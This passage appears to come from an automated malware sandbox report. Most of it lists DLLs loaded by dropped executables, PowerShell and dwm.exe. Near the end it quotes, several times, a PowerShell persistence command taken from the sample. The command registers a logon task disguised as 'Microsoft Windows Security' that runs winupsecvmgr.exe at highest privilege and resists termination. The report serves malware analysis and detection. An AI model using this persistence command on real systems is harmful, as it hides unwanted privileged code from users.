                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                                Source: lJ4EzPSKMj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp
                                Source: lJ4EzPSKMj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: lJ4EzPSKMj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: lJ4EzPSKMj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: lJ4EzPSKMj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: lJ4EzPSKMj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                Suspicious powershell command line found
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
